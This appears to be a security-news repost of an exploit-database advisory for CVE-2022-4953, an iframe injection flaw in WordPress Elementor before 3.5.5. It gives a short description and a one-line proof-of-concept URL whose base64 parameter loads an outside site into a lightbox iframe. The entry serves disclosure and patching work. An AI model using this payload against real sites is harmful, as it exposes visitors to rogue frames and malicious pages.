Headline

WordPress Elementor Iframe Injection

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

1 year ago

#vulnerability #google #wordpress #auth #firefox

# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection# Date: 28.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://elementor.com/# Version: < 3.5.5# Tested on: Google and Firefox latest version# CVE : CVE-2022-4953# 1. DescriptionThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.# 2. Proof of Concept (PoC)Proof of Concept:https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

Related news

CVE-2022-4953

The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.

1 year ago

CVE

Open in Source

#web #wordpress